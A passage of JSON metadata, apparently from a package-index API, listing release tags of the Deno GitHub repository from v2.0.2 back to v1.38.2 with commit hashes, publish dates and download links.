com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v